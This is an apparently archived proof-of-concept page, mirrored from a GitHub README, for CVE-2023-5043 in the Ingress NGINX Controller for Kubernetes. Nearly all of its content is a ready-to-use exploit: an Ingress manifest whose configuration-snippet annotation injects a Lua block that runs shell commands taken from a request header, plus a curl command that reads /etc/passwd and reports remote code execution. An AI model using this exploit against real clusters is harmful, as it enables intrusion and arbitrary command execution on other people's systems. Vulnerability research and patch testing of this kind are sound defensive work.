支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: b1309892595133d785d9f9148290d1a94ff3faca

来源
https://github.com/r0binak/CVE-2023-5043
关联漏洞
标题:Ingress NGINX Controller 注入漏洞 (CVE-2023-5043)
Description:Ingress NGINX Controller是Kubernetes开源的一个 Kubernetes 的入口控制器。 Ingress NGINX Controller 存在安全漏洞。攻击者利用该漏洞可以执行任意命令。
Description
PoC CVE-2023-5043
介绍
# CVE-2023-5043
**Ingress nginx annotation injection causes arbitrary command execution**

1. Create Ingress (can be created without Service and Pod)
```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ingress-exploit
  annotations:
    kubernetes.io/ingress.class: "nginx"
    nginx.ingress.kubernetes.io/configuration-snippet: |
      more_set_headers "robinak"
            proxy_pass http://upstream_balancer;
                                proxy_redirect                          off;
        }
        location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
spec:
  rules:
  - host: robinak.me
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: exploit
            port:
              number: 80
```
2. Make request by specifying the public address of your Ingress NGINX controller:
```bash
curl -v -H 'Host: robinak.me' -H "cmd: cat /etc/passwd" http://IP/robinak/
```
3. Got RCE
![1cveed](https://github.com/r0binak/CVE-2023-5043/assets/80983900/218a28ca-5f7f-427e-87a4-c025ff97f496)
文件快照

 [4.0K]  /data/pocs/b1309892595133d785d9f9148290d1a94ff3faca
└── [1.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。